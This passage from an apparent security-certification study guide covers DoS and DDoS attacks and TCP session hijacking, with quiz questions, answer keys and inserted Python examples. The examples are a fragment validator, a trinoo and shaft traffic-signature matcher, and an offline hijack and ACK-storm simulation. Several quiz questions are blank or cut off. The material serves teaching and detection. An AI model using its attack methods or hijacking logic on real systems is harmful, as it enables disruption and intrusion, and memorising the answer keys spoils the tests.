d. ICMP tunnel
23. Which is the best description of a sniffer?
a. A legitimate program that has been altered by the placement of unauthorized code
within it
b. A program used to combine two or more executables into a single packaged
program
c. A piece of software that captures the traffic flowing into and out of a computer
attached to a network
d. A method of conveying information by changing a system's stored data
24. Which statement is the best description of ARP spoofing?
a. A program that redirects port traffic
b. A piece of software that captures the traffic flowing into and out of a computer
attached to a network
c. The act of attempting to overload the switch's CAM table
d. An attacker who poisons the ARP cache on a network device to reroute the victim's
packets to his or her machine
25. What does the EtherFlood tool do?
a. It's a freeware Unix sniffer.
b. It poisons the ARP cache.
c. It floods a switched network with Ethernet frames containing random hardware
addresses.
d. It redirects port 80 to port 139 on the target machine.
Answers
1. Answer: b
2. Answer: c
3. Answer: d
4. Answer: a
5. Answer: b
6. Answer: d
7. Answer: a
8. Answer: c
9. Answer: d
10. Answer: b
11. Answer: c
12. Answer: d
13. Answer: a
14. Answer: b
15. Answer: c
16. Answer: a
17. Answer: b
18. Answer: d
19. Answer: a
20. Answer: c
21. Answer: b
22. Answer: a
23. Answer: c
24. Answer: d
25. Answer: c
DOS Attacks
DoS attacks fall into the following general categories:
Consumption of resources such as storage space, bandwidth, and CPU utilization
Protocol attacks
Logic attacks
Consumption of resources attacks use up communication bandwidth to limit network throughput, fill up
storage space, or keep the CPU working at almost full capacity. Protocol attacks exploit design rules
of widely used network protocols such as ICMP, UDP, and TCP and attempt to confuse the target
computer by presenting packets that do not adhere to expected patterns and formats. Logic attacks
take advantage of weaknesses in network-related software.
As a corollary to these major types of DoS attacks, compromise of the physical network components
and disruption of network configuration information can also result in a denial of service.
Some typical DoS attacks are as follows:
Smurf. This attack uses the Internet Control Message Protocol (ICMP) to overwhelm the target's
network with message traffic. To initiate smurf, the attacker spoofs the IP source address of the
ping packet by inserting the address of the target site as the source address. Then, the spoofed
packet is sent to the broadcast address of a very large network. When all the sites on the network
receive the ICMP Echo requests, they respond by sending a message to the source address in
the ping packet. The target network is overwhelmed by all the messages sent simultaneously, so
it is unable to provide service to legitimate messages.
Fraggle. A fraggle attack is similar to a smurf attack but uses UDP echo packets instead of ICMP
echo packets. The attacker sends large numbers of UDP echo messages to IP broadcast
addresses of a very large network. The UDP packets have spoofed source addresses that are
the address of the target machine. The broadcast sites then respond to the echo requests by
flooding the target machine.
SYN flood. To initiate a SYN flood attack, the attacker sends a high volume of synchronization
(SYN) requests to establish a communication connection to the target computer. In this
communication protocol, the target machine responds with an acknowledgment of receiving the
SYN requests by sending back SYN/ACK messages. The target machine maintains a buffer
queue known as a backlog queue for the SYN/ACK messages and waits for the attacker machine
to send an acknowledgment (ACK) message for each of the SYN/ACK responses; however, the
attacker machine does not respond with any ACK messages. The problem is that SYN/ACK
messages are maintained in the queue of the target computer until an ACK is received for each
SYN/ACK message. As a result, the queue becomes saturated and the target computer does not
respond to legitimate communication requests. In addition, the target system might crash.
Chargen. A chargen attack connects ports between two Unix or Linux computers. The two
machines then send high volumes of messages to each other and cause saturation of their
network bandwidths. These computers usually have a chargen port (19) and an echo port (7).
The attacker generates forged UDP packets to connect the chargen port on one machine to the
echo port on the other machine. The chargen port generates repeated sets of ASCII characters
and the echo port retransmits or echoes the transmissions it receives. Therefore, the resulting
high volume of messages between the two computers consumes the available communication
bandwidth and keeps the computers from handling normal communications.
Ping of death. In the ping-of-death attack, the attacker uses an oversized (>65,536 bytes) ICMP
packet. Normally, an IP packet is not permitted to be larger than 65,536 bytes, but IP does permit
a packet to be divided into smaller fragments. If the fragments are of sizes such that when they
are reconstituted they produce a packet larger than 65,536 bytes, the operating system either
freezes or crashes when the packets are reassembled. SSPing is a tool that implements the
ping-of-death type DoS attack.
Ping flood. This attack is effected by using the ping -f command to send a very large number
of ping (ICMP echo) packets to the target computer. To be effective, the hacker must have
greater bandwidth available than the target. If the target responds with ICMP echo reply packets,
both the incoming and outgoing bandwidths available for communication with legitimate sources
are reduced.
Teardrop. The teardrop attack involves sending fragmented packets with offsets such that some
bytes in the fragments overlap when they are reassembled at the target machine. Because the
receiving computer cannot handle overlapping fragments, it usually crashes or freezes.
Land. The land exploit is accomplished by sending a TCP SYN packet with the identical source
and destination port and IP address to a target machine. The target machine becomes confused
by the flawed packet and usually goes into a frozen state where the CPU shows 100-percent
utilization.
Buffer overflow. A buffer overflow results from a programming error that permits writing more
data into a fixed length buffer than the buffer can hold. When this occurs, the data overflow the
buffer and overwrite adjacent memory areas. The additional overflow data might cause the
program to run in an unexpected manner or the system to shut down, or the data might be
executed as malicious code. Proper bounds checking can prevent buffer overflows.
WinNuke. The WinNuke exploit transmits out of band (OOB) data to the IP address of a
Windows computer. The data are sent to port 139, the NetBIOS port, of the target machine. The
software in the target computer usually is not designed to accept OOB data, so the computer
crashes and presents the blue screen.
SMBdie. The server message block (SMB) attack targets Microsoft operating systems by using
the SMB protocol and sending a malformed packet request to port 139 or 445. If the connection
and attack succeed, the buffer of the target computer is flooded and communication on the
network is no longer possible.
Jolt. In a jolt attack, a large ICMP packet is fragmented in a manner such that the target machine
cannot reassemble it. This situation causes the target computer to freeze.
Targa. Targa is a set of programs that can be used to run a number of denial-of-service exploits,
including land, teardrop, WinNuke, and jolt.
Bubonic.c. Bubonic.c sends TCP packets containing random settings designed to consume the
target machine's resources to the extent that the target machine crashes.
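The ping-of-death, teardrop and jolt entries above all come down to what a fragment set looks like before it is reassembled, which is where a defensive stack should reject it. The following is an added example, not from the book: it validates one datagram's fragments against the IP length limit and checks for overlaps, gaps and malformed flags. The fragment sets are constructed, and the names returned by classify() are simply the text's labels for those patterns.

```python
MAX_DATAGRAM = 65535  # the IP total-length field is 16 bits; the text rounds this to 65,536
IP_HEADER_LEN = 20    # minimum header; reassembled size = header + payload bytes


def check_fragments(frags):
    """Validate one datagram's fragment set (same source, destination, ID and
    protocol) before reassembly.

    Each fragment is {"offset": n, "length": bytes, "mf": bool}, with offset in
    the 8-byte units of the IP header field. Returns a list of (label, detail)
    findings; an empty list means the fragments tile the payload exactly and
    the result fits in a datagram.
    """
    findings = []
    ordered = sorted(frags, key=lambda f: f["offset"])
    expected_start = 0  # byte at which the next fragment should begin
    for i, f in enumerate(ordered):
        start = f["offset"] * 8
        end = start + f["length"]
        last = i == len(ordered) - 1
        if f["mf"] and f["length"] % 8:
            findings.append(("malformed", f"non-final fragment at {start} has length "
                                          f"{f['length']}, not a multiple of 8"))
        if not f["mf"] and not last:
            findings.append(("malformed", f"fragment at {start} clears MF but more follow"))
        if start < expected_start:
            # teardrop: the new fragment lands inside data already received
            kind = "overlap-inside" if end <= expected_start else "overlap"
            findings.append((kind, f"fragment {start}-{end} overlaps data covered to {expected_start}"))
        elif start > expected_start:
            findings.append(("gap", f"no data between {expected_start} and {start}"))
        if end + IP_HEADER_LEN > MAX_DATAGRAM:
            # ping of death: the reassembled datagram cannot be addressed in 16 bits
            findings.append(("oversize", f"reassembled datagram would be {end + IP_HEADER_LEN} bytes"))
        expected_start = max(expected_start, end)
        if last and f["mf"]:
            findings.append(("incomplete", "final fragment still has MF set"))
    return findings


def classify(frags):
    """Map findings onto the attack names used in the text (a convenience for the demo)."""
    labels = {label for label, _ in check_fragments(frags)}
    if "oversize" in labels:
        return "ping of death"
    if labels & {"overlap", "overlap-inside"}:
        return "teardrop"
    if labels & {"gap", "incomplete", "malformed"}:
        return "unreassemblable (jolt-style)"
    return "ok"


# Constructed fragment sets (not captures): a normal 2000-byte payload split at a
# 1500-byte MTU, an oversized echo request abbreviated to its first and last
# fragments, and an overlapping teardrop pair.
NORMAL = [{"offset": 0, "length": 1480, "mf": True},
          {"offset": 185, "length": 520, "mf": False}]
PING_OF_DEATH = [{"offset": 0, "length": 1480, "mf": True},
                 {"offset": 8189, "length": 100, "mf": False}]  # 65512 + 100 + 20 > 65535
TEARDROP = [{"offset": 0, "length": 40, "mf": True},
            {"offset": 3, "length": 4, "mf": False}]  # bytes 24-28 lie inside the first
```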
DDoS Attacks
DDoS attacks make use of compromised intermediate computers to launch many attacks on a target
machine simultaneously. The DDoS attack comprises the following two phases:
1. Mass Intrusion Phase: Master servers conduct computerized searches for and exploration of
potential weaknesses in a large number of computers, known as primary victims, clients, or
daemons, and install DDoS attack software on these primaries.
2. DDOS Attack Phase: Using the daemons, the attacker launches large-scale DoS attacks
against the target.
This process is illustrated in Figure 9-1.
Trinoo (TrinOO). Trinoo implements DDoS attacks through synchronized UDP communication
floods. It is initiated by the attacker communicating with the trinoo master to launch a DoS attack
against specified IP addresses. The master, in turn, sends instructions to the clients to attack the
specified IP addresses for a given time duration. The attacker to master server communication is
password protected and is accomplished through master destination port 27665/tcp. The master
to client communication is through destination port 27444/udp and requires the UDP packet to
include the string l44. The trinoo daemon communicates its availability to the server masters
through destination port 31335/udp. Trinoo daemons have been given a variety of names,
including trinix, irix, http, ns, and rpc.trinoo.
TFN. TFN is similar to trinoo in that it provides the capability to launch a DDoS attack with
multiple clients generating UDP flood attacks against a target. In addition, TFN can produce
packets with spoofed IP source addresses and can launch smurf, ICMP echo request flood, and
TCP SYN flood attacks. The TFN master communicates with clients using ICMP echo reply
packets and sends the target IP addresses to the clients.
Stacheldraht. This DDoS tool uses multiple layers to launch attacks against remote hosts. The
communication proceeds from the attacker to client software to handlers to zombie agents (or
daemons) to targeted victims. Stacheldraht means barbed wire in German and is directed toward
Linux and Solaris operating systems. It supports attacker-to-handler encrypted communications
and can launch smurf, ICMP flood, UDP flood, and ICMP flood attacks.
TFN2K. TFN2K is a DDoS program that uses the client-server (zombie) architecture similar to
TFN to launch flood attacks. It can spoof IP source addresses and operate with TCP, ICMP, and
UDP protocols. It can also send decoy packets to avoid detection as well as cause systems to
crash by sending malformed packets.
Trinity. In trinity, messages from the attacker or handler to the daemon are sent by means of AOL
ICQ or Internet Relay Chat (IRC). It also conducts flooding attacks using SYN, RST, ACK, UDP,
and fragments.
Shaft. A shaft DDOS operates with the client controlling the duration of the attack and the size of
the flood packets, which all have a sequence number of 0x28374839. It functions similar to a
trinoo attack.
Mstream. The purpose of this tool is to enable intruders to utilize multiple Internet connected
systems to launch packet flooding denial of service attacks against one or more target systems.
Similar to trinoo, mstream comprises a handler and daemon, where communication from the
attacker to the handler is password protected.
Find DDoS 2.0. This DDoS malicious software uses malformed packets to crash information
systems.
Security Auditors Research Assistant (SARA). This is a network security analysis tool
based on the Security Administrator Tool for Analyzing Networks (SATAN) model. SARA
performs vulnerability scans and searches for default configuration settings, configuration
errors, and known system vulnerabilities.
DDoSPing. This software conducts remote scans for such DDoS software as tribe flood,
trinoo, and Stacheldraht executing with their default settings.
Remote Intrusion Detection (RID). RID uses intrusion fingerprints to track down
compromised hosts. It is capable of remotely detecting Stacheldraht, TFN, and trinoo if the
attacker did not change the default ports.
BindView Zombie Zapper. This is an open source tool that can disable daemons sending
flood packets in attacks such as TFN, trinoo, and Stacheldraht.
FBI National Infrastructure Protection Center (NIPC) Find DDoS. This software is useful
for checking firewall or network configurations to detect DDoS Trojans.
Ramenfind. Ramenfind detects and removes the Ramen worm, which was modified to
install DDoS agents.
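The control-channel details quoted above for trinoo (ports 27665/tcp, 27444/udp with the string l44, 31335/udp) and shaft (sequence number 0x28374839) are exactly what tools such as RID look for. The following is an added example, not from the book or from any of the tools named: it turns those details into signatures over a constructed packet list and groups the hits into master/daemon roles. The addresses and payloads are made up, and the matcher shares RID's limitation of catching only the tools' default settings.

```python
from collections import defaultdict

# Control-channel characteristics quoted in the text for trinoo and shaft. They
# are the tools' defaults; an attacker who changes them defeats any check that
# relies on them, which is the caveat given for RID above.
TRINOO_ATTACKER_TO_MASTER_TCP = 27665
TRINOO_MASTER_TO_DAEMON_UDP = 27444
TRINOO_DAEMON_MARKER = b"l44"          # must appear inside the 27444/udp payload
TRINOO_DAEMON_TO_MASTER_UDP = 31335
SHAFT_FLOOD_SEQ = 0x28374839


def match_packet(pkt):
    """Return the signature name a packet matches, or None.

    pkt is a dict: proto ("tcp"/"udp"), src, dst, sport, dport, payload (bytes)
    and, for TCP, seq. The port alone is not enough for 27444/udp: the payload
    must carry the marker, which keeps ordinary high-port UDP traffic out.
    """
    tcp, udp = pkt["proto"] == "tcp", pkt["proto"] == "udp"
    if tcp and pkt["dport"] == TRINOO_ATTACKER_TO_MASTER_TCP:
        return "trinoo attacker->master"
    if udp and pkt["dport"] == TRINOO_MASTER_TO_DAEMON_UDP and TRINOO_DAEMON_MARKER in pkt["payload"]:
        return "trinoo master->daemon"
    if udp and pkt["dport"] == TRINOO_DAEMON_TO_MASTER_UDP:
        return "trinoo daemon->master"
    if tcp and pkt.get("seq") == SHAFT_FLOOD_SEQ:
        return "shaft flood"
    return None


# Which end of each signature plays which role in the handler/daemon hierarchy.
ROLES = {
    "trinoo attacker->master": ("attacker", "trinoo master"),
    "trinoo master->daemon": ("trinoo master", "trinoo daemon"),
    "trinoo daemon->master": ("trinoo daemon", "trinoo master"),
    "shaft flood": ("shaft agent", "flood target"),
}


def infer_roles(packets):
    """Aggregate signature hits into a per-host role map: {host: [roles]}."""
    roles = defaultdict(set)
    for pkt in packets:
        sig = match_packet(pkt)
        if sig:
            src_role, dst_role = ROLES[sig]
            roles[pkt["src"]].add(src_role)
            roles[pkt["dst"]].add(dst_role)
    return {host: sorted(r) for host, r in roles.items()}


def pkt(proto, src, dst, sport, dport, payload=b"", seq=None):
    return {"proto": proto, "src": src, "dst": dst, "sport": sport,
            "dport": dport, "payload": payload, "seq": seq}


# Constructed sample traffic (private and documentation addresses, made-up payloads).
SAMPLE = [
    pkt("tcp", "10.9.9.9", "10.0.0.5", 40001, 27665, b"..."),
    pkt("udp", "10.0.0.5", "10.0.0.21", 1024, 27444, b"png l44"),
    pkt("udp", "10.0.0.21", "10.0.0.5", 1025, 31335, b"PONG"),
    pkt("udp", "10.0.0.33", "10.0.0.21", 5000, 27444, b"hello"),   # right port, no marker
    pkt("tcp", "10.0.0.21", "203.0.113.7", 2000, 80, b"", seq=0x28374839),
    pkt("tcp", "10.0.0.50", "203.0.113.7", 2001, 80, b"GET / ", seq=12345),
]
```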
Secure network hosts.
Prohibit ICMP messages from external sources to access the network's broadcast and multicast
addresses.
Session Hijacking
Session hijacking occurs when an attacker takes over an existing, authenticated communication that
has been initiated by a valid user. The attacker replaces a valid user on one end of the communication
and continues the message exchange, pretending to be the valid user. Session hijacking is illustrated
in Figure 9-2.
A layered architecture divides communication processes into individual layers with standard
interfaces. These layers are designed to be modular and easier to maintain independently of the other
layers. Also, different protocol standards are used in each layer.
In the layered architecture, data flow downward from the top layer to the bottom layer. The top layer is
nearest to the user applications, and the bottom layer is concerned with transmitting electrical or
optical signals over conductors to the destination of the communication. As the data traverse the
layers, each layer encapsulates the data before sending them to the next layer. At the receiving end,
the data proceed up the layers from the electrical conductor interface to the user application layer,
with the data being unencapsulated or stripped as they move up the layers.
The Internet is based on the Transmission Control Protocol/Internet Protocol (TCP/IP) suite of
protocols, which comprises the following four layers:
Application layer
Host-to-host layer
Internet layer
Network access layer
The TCP/IP layers are shown in Figure 9-4, which pairs each layer with its function and representative
protocols:
Layer            Protocols
Application      SMTP, FTP, Telnet, and other user-facing protocols
Host-to-host     TCP, UDP
Internet         IP, ARP, RARP, ICMP
Network access   FDDI, Ethernet, X.25
Transmission Control Protocol (TCP). TCP provides reliable, full-duplex, connection-oriented
transmission: the receiver acknowledges the segments it gets, and every segment carries a sequence
number so the receiver can reassemble the data in order and detect missing segments.
User Datagram Protocol (UDP). UDP delivers packets on a best effort basis and is not
concerned with packet sequencing or error free delivery. It is defined as a connectionless
protocol.
IP (Internet Protocol). IP places source and destination addresses on each packet but provides an
unreliable datagram service: there is no guarantee that packets will be delivered to the
destination or arrive in the order sent. Routers make their forwarding decisions based on the IP
destination address in each packet.
Address Resolution Protocol (ARP). ARP matches the IP destination address of a data packet
to the MAC (Ethernet) address of the destination computer.
Reverse Address Resolution Protocol (RARP). RARP provides the reverse service of ARP in
that it maps a known MAC address to an IP address.
Internet Control Message Protocol (ICMP). ICMP carries error and control messages about packet
delivery, such as destination unreachable, redirect (alternate routing), and time exceeded, and so
reports on the health of the network. The ping utility is built on ICMP echo request and echo reply
messages and is used to check network paths and the availability of machines on a network.
Simple Mail Transfer Protocol (SMTP). SMTP is used for transmission and reception of email.
Sequence Numbers
Sequence numbers are important to the conduct of session hijacking. Sequence numbers are
assigned to packets to ensure that they can be reassembled at the receiving end in the correct order
and to check for missing packets. A TCP communication session is set up by a three-way handshake
process as follows:
1. The client (communication initiator) sends a synchronization packet to the server. The
synchronization packet is characterized by the SYN flag being set in the packet. The packet
contains a pseudo-random 32-bit Initial Sequence Number (ISN), N, and a Window size (WIN). A
32-bit ISN can take any of 2^32 (4,294,967,296) values. The Window size advertises how many
bytes the sender of the packet is prepared to receive, that is, the free space in its input
buffer; each side of the session advertises its own window.
2. The receiving host acquires the packet and stores the ISN. Then, the receiving host responds
with a packet containing acknowledgment (ACK) and SYN flags and a 32-bit Acknowledgment
Number, which indicates the next sequence that the receiving host is anticipating. In this case,
the expected sequence number is N+1. The receiving computer also sends its own Initial
Sequence Number, Y, to the initiating client.
3. The client replies with a packet with the ACK flag set and containing the next Sequence
Number, N+1, and an Acknowledgement Number of Y+1. The Acknowledgment Number, Y+1,
indicates that the client is expecting a packet from the receiving host with a Sequence Number
of Y+1.
Therefore, for an attacker to hijack a session and replace, for example, the initiating host, he or she
must be able to anticipate the correct Sequence Number to put in his or her packet to make a smooth
transition in replacing the initiating host. This hijacking must be accomplished after the initial session
set up and authentication and before the session ends.
There are two types of session hijacking, active and passive. In an active attack, the attacker
identifies an active session and takes it over. Taking over a session is practical only when it
carries an unencrypted application protocol such as FTP or Telnet, so that the attacker can read
the exchange and inject commands the server will act on.
A passive attack is accomplished by the attacker hijacking a session but not actively taking it over and
participating in a communication exchange. Instead, the attacker monitors the message traffic and
obtains information from the packet stream. Examples of information obtained are passwords and
user identifications.
If the attacker does not completely control the flow of packets between the parties, some
communication between the legitimate parties may continue. For example, the server might send an
ACK packet to the originating client with an acknowledgment number the client is not expecting,
because it acknowledges data the attacker injected rather than data the client sent. The client
responds with an ACK carrying the sequence number it is actually at, which the server in turn does
not expect, so the server re-sends its last ACK. Because bare ACKs carry no data, neither side's
state changes, and the exchange continues at a high rate as an ACK Storm that can saturate the
link. Therefore, the attacker must act quickly when hijacking a session to prevent an ACK Storm.
An ACK Storm is avoided altogether when the attacker uses ARP cache poisoning, because the attacker
then sits in the path and the two hosts no longer communicate directly.
If an ACK Storm does materialize, it can be cleared if the attacker transmits a TCP packet with the
reset (RST) flag set to both parties in the communication session. The reset will terminate the
communication session.
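The following simulation, added here as an example rather than code from the book, works through the handshake numbers in the three steps above and then the hijack and ACK Storm just described. The endpoint model, the forged segment and the sample payloads are constructed for the example; nothing is transmitted.

```python
"""Model of the TCP sequence and acknowledgment bookkeeping described above:
the three-way handshake, a hijacker injecting a segment with the predicted
numbers, the ACK storm that follows when the legitimate client keeps talking,
and the RST that clears it. Pure simulation: no packets leave the host."""
from dataclasses import dataclass

MOD = 2 ** 32  # sequence numbers are 32 bits wide and wrap around


@dataclass
class Segment:
    src: str
    dst: str
    flags: frozenset
    seq: int
    ack: int
    payload: bytes = b""


@dataclass
class Endpoint:
    name: str
    snd_nxt: int            # next sequence number this side will send (starts at its ISN)
    rcv_nxt: int = 0        # next sequence number this side expects to receive
    received: bytes = b""
    closed: bool = False

    def send(self, dst, flags, payload=b""):
        seg = Segment(self.name, dst, frozenset(flags), self.snd_nxt, self.rcv_nxt, payload)
        # A SYN consumes one sequence number; so does every payload byte. A bare ACK consumes none.
        self.snd_nxt = (self.snd_nxt + len(payload) + ("SYN" in flags)) % MOD
        return seg

    def receive(self, seg):
        """Accept an in-order segment and return True; reject anything else."""
        if "RST" in seg.flags:
            self.closed = True
            return True
        if "SYN" in seg.flags:
            self.rcv_nxt = (seg.seq + 1) % MOD      # expect ISN + 1 next
            return True
        if seg.seq != self.rcv_nxt:
            return False                            # peer is desynchronised
        self.rcv_nxt = (self.rcv_nxt + len(seg.payload)) % MOD
        self.received += seg.payload
        return True


def three_way_handshake(client_isn, server_isn):
    client, server = Endpoint("client", client_isn), Endpoint("server", server_isn)
    syn = client.send("server", {"SYN"})              # seq = N
    server.receive(syn)                                # server now expects N+1
    synack = server.send("client", {"SYN", "ACK"})    # seq = Y, ack = N+1
    client.receive(synack)                             # client now expects Y+1
    ack = client.send("server", {"ACK"})              # seq = N+1, ack = Y+1
    server.receive(ack)
    return client, server, (syn, synack, ack)


def forge_from_sniffed(last_client_segment, payload):
    """Attacker's prediction: the client's next seq is the last seq it used plus what
    that segment consumed; the ack field is whatever the client last acknowledged."""
    consumed = len(last_client_segment.payload) + ("SYN" in last_client_segment.flags)
    return Segment("client", "server", frozenset({"ACK"}),
                   (last_client_segment.seq + consumed) % MOD, last_client_segment.ack, payload)


def ack_storm(client, server, max_rounds=50):
    """After the injection the server's rcv_nxt is ahead of the client's snd_nxt. Each
    side answers the other's unexpected ACK with an ACK of its own; bare ACKs carry no
    data, so nothing changes and the exchange repeats. Returns the rounds simulated."""
    rounds = 0
    while server.rcv_nxt != client.snd_nxt and rounds < max_rounds:
        server.send("client", {"ACK"})                   # "I expect seq X" (X is ahead of the client)
        server.receive(client.send("server", {"ACK"}))   # client's seq is stale: rejected, server re-ACKs
        rounds += 1
    return rounds


def clear_storm(client, server):
    """The attacker's way out: a RST to each party tears the connection down."""
    client.receive(Segment("server", "client", frozenset({"RST"}), server.snd_nxt, client.snd_nxt))
    server.receive(Segment("client", "server", frozenset({"RST"}), client.snd_nxt, server.snd_nxt))
    return client.closed and server.closed
```

Run with a client ISN of 1000 and a server ISN of 5000: the SYN/ACK acknowledges 1001, the final ACK carries seq 1001 and ack 5001, and after the client sends a 10-byte command the attacker's forged segment needs seq 1011 to be accepted. The storm loop never converges on its own; only the RSTs end it.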
Ettercap. Ettercap performs live connection sniffing, ARP cache poisoning, dissecting of
protocols, and supporting of man-in-the-middle attacks. Figure 9-5 shows an Ettercap window
with sniffed live connections and the connection attribute. A connection with an asterisk indicates
that a password was captured.
Hunt. The Hunt software targets Linux systems and conducts session hijacking, including ARP
cache poisoning, sniffing, monitoring connections, resetting TCP connections, and discovering
MAC addresses. Hunt is different from other tools in that it can return a hijacked session to the
original communicating entities and resynchronize the Sequence Number.
TTY Watcher. TTY Watcher is limited to monitoring and controlling users on a single Solaris
machine, rather than on a network. Like Hunt, it has the ability to return a hijacked session to a
user. It operates by allowing the attacker to share a login session with a valid user.
IP Watcher. IP Watcher is a network security and administration tool for Linux systems that
incorporates active countermeasures. It allows an attacker to control a login session and monitor
network communication connections on any TCP port. It can also be used as a tool against
attackers.
Juggernaut. Juggernaut is a network sniffer and monitoring tool for Linux systems. It monitors
network communication sessions and supports an attacker hijacking one or more of the sessions.
P.A.T.H. P.A.T.H. stands for Perl Advanced TCP Hijacking and is a set of tools for monitoring and
hijacking network communication sessions written in Perl. It incorporates a sniffer, a packet
generator for building different types of packets, and ARP cache poisoning.
T-Sight. T-Sight is a commercial tool that supports local session hijacking on Windows systems
and active monitoring of network connections. It performs ARP cache poisoning and also can be
used as a post-mortem network analysis tool. Figure 9-6 shows the main real-time window of
T-Sight. The screen has the following network statistics at the bottom:
Left side: No packets have been dropped (0%).
Next data: 2 packets/second is the network average transmission rate.
Next data: 7 packets traversed the network in the last second.
At the top of the screen, an active session is indicated by the double arrow.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1. What type of information system attack has the objective of consuming the resources of an
information system to the point that it cannot perform its normal functions for legitimate
users?
a. Denial of service
b. Social engineering
c. Session hijacking
d. Masquerading
2. What type of attack originates from a large number of computers infected with bot
software?
a. Social engineering
4.
5.
6.
7. Which DoS attack uses the Internet Control Message Protocol (ICMP) to overwhelm the
victim's network with message traffic? (To initiate the attack, the attacker spoofs the IP
source address of the ping packet by inserting the address of the victim site as the source
address.)
a. SYN flood
b. Smurf
c. Fraggle
d. Chargen
8.
Which DoS attack connects ports between two Unix or Linux computers through which
they send high volumes of messages to each other and cause saturation of their network
bandwidths?
a. Chargen
b. SYN flood
c. Fraggle
d. Smurf
9.
Which DoS attack sends large numbers of UDP echo messages with spoofed source
addresses to IP broadcast addresses of a very large network?
a. SYN flood
b. Smurf
c. Fraggle
d. Chargen
10. Which DoS attack uses an oversized (>65,536 bytes) ICMP packet to create a situation
where the operating system of the target machine either freezes or crashes?
a. Teardrop
b. Ping flood
c. Fraggle
d. Ping of death
11. Which DoS exploit is accomplished by sending a TCP SYN packet with the identical
source and destination port and IP address to a target machine?
a. Teardrop
b. Land
c. Ping flood
d. Fraggle
12. Which DoS attack results from a programming error that permits writing more data into a
fixed length buffer than the buffer can hold?
a. Jolt
b. WinNuke
c. Teardrop
d. Buffer overflow
13. Which DoS exploit transmits Out of Band (OOB) data to the IP address of a Windows
computer?
a. WinNuke
b. Targa
c. Jolt
d. SMBdie
14. Which DoS tool is a set of programs that can be used to run a number of denial service
exploits, including land, teardrop, WinNuke, and jolt?
a. SMBdie
b. Targa
c. Bubonic.c
d. Ping flood
15. Which attack comprises a Mass Intrusion Phase and Attack Phase?
a. Dictionary
b. Replay
c. DDoS
d. Back door
16. Groups of infected clients used in a DDoS attack are called which one of the following?
a. Data points
b. Botnets
c. DoSnets
d. Seconds
17. Which DDoS attack tool implements synchronized UDP communication floods?
a. Find DDoS
b. Trinity
c. Stacheldraht
d. Trinoo
18. Which DDoS attack tool uses multiple layers to launch attacks against Linux and Solaris
remote hosts, where the communication proceeds from the attacker to client software to
handlers to zombie agents (demons) to targeted victims?
a. Stacheldraht
b. Trinity
c. TFN
d. Shaft
19. In which DDoS attack are messages from the attacker or handler to the daemon sent by
means of AOL ICQ or Internet Relay Chat (IRC)?
a. Trinoo
b. Trinity
c. TFN2K
d. Shaft
20. Which one of the following actions is not a measure that is taken to reduce the
chances of a successful DoS attack?
a. Apply router filtering.
b. Conduct backups of information and configuration data.
c. Delay installation of appropriate software patches.
d. Disable unneeded network services.
21. Which one of the following actions is not a measure that is taken to reduce the
chances of a successful DDoS attack?
a. Permit ICMP messages from external sources to access a network's broadcast and
multicast addresses.
b. Apply stateful inspection firewalls to verify valid TCP connections.
c. Install intrusion detection systems (IDSs).
d. Use zombie scanning software.
22. NetProwler, Snort, Network Flight Recorder, and Dragon are examples of what type of
tool?
a. Virus scanner
b. Intrusion prevention system
c. Patch management
d. Intrusion detection system
23. What type of tools are DDoSPing, Security Auditors Research Assistant (SARA), and
dds?
a. Zombie scanning software
b. Cookie scanning software
c. Penetration software
d. Router scanning software
24. What attack occurs when an attacker takes over an existing, authenticated communication
that has been initiated by a valid user and replaces the valid user on one end of the
communication?
a. Denial of Service
b. Session hijacking
c. Distributed denial of Service
d. Spoofing
25. What attack involves an attacker pretending to be the valid user and making his or her
own connection to a network server?
a. Session hijacking
b. Distributed denial of Service
c. Spoofing
d. Social engineering
26. What structure is used to divide communication processes into individual layers with
standard interfaces?
a. Virtual architecture
b. Boolean minimization
c. Stepwise reduction
d. Layered architecture
27. What is a set of rules that define how entities communicate with each other over
telecommunication networks?
a. Communication constraints
b. Structured programming
c. Protocol
d. Layered architecture
28. Which one of the following is not a layer in the TCP/IP protocol?
a. Host-to-host layer
b. Session layer
c. Internet layer
d. Network access layer
29. Which layer of TCP/IP provides end-to-end data delivery service and error free packet
delivery?
a. Application layer
b. Session layer
c. Host-to-host layer
d. Internet layer
30. IP, ARP, and ICMP are protocol standards in which TCP/IP layer?
a. Internet layer
b. Application layer
c. Network access layer
d. Session layer
31. For an attacker to hijack a session and replace an initiating host, he or she must be able to
predict what item?
a. Session number
b. Sequence Number
c. Modem number
d. Network number
32. What are the two types of session hijacking?
a. Active and brute force
b. Replay and passive
c. Active and passive
d. Detective and preventive
33. Which one of the following actions is not a step in hijacking an authenticated connection?
a. Request a third-party connection from one of the users.
b. Find and track an active session.
c. Take one of the parties offline.
d. Inject the attacker's packet.
34. What action is occurring when an attacker's computer sends a spoofed reply to the ARP
request providing its MAC address as being assigned to the IP address of another
computer?
a. Local session hijacking
b. Blind session hijacking
c. Cache poisoning
d. MAC attack
35. Which one of the following is not a tool for session hijacking?
a. Ettercap
b. T-Sight
c. Juggernaut
d. Local
36. Which one of the following is not a method for protecting against session hijacking?
a. Permitting remote access
b. Encryption
c. Strong authentication
d. Restricting traffic into the network
Answers
1. Answer: a
2. Answer: b
3. Answer: c
4. Answer: b
5. Answer: a
6. Answer: d
7. Answer: b
8. Answer: a
9. Answer: c
10. Answer: d
11. Answer: b
12. Answer: d
13. Answer: a
14. Answer: b
15. Answer: c
The correct answer is c. Answer a, dictionary attack, uses a dictionary of common passwords to
gain network access. Answer b, replay, occurs when an attacker intercepts and saves old
messages to send later. Answer d, back door, is an attack that takes place using dial-up modems
or asynchronous external connections.
16. Answer: b
17. Answer: d
18. Answer: a
19. Answer: b
20. Answer: c
21. Answer: a
22. Answer: d
23. Answer: a
24. Answer: b
25. Answer: c
26. Answer: d
27. Answer: c
28. Answer: b
29. Answer: c
30. Answer: a
31. Answer: b
32. Answer: c
33. Answer: a
34. Answer: c
35. Answer: d
36. Answer: a
Level II, Network evaluation. More hands-on than a Level I assessment, a Level II assessment
has some of the Level I activities with more information gathering and scanning.
Level III, Penetration test. A penetration test is not usually concerned with policies. It's more
about taking the adversarial view of a hacker, by seeing what can be accomplished and with what
difficulty.
The reason a security professional may wish to conduct a penetration test of his or her company is
the same as the reason a business has a security policy: to demonstrate due diligence and due care
in protecting data, and so preserve the company's capital investment.
Several factors have converged in the marketplace to make penetration testing a necessity. The
evolution of information technology has focused on ease of use at the operational end, while
exponentially increasing the complexity of the computer. Unfortunately, the administration and
management requirements of these systems have increased because:
The skill level required to execute a hacker exploit has steadily decreased.
The size and complexity of the network environment has mushroomed.
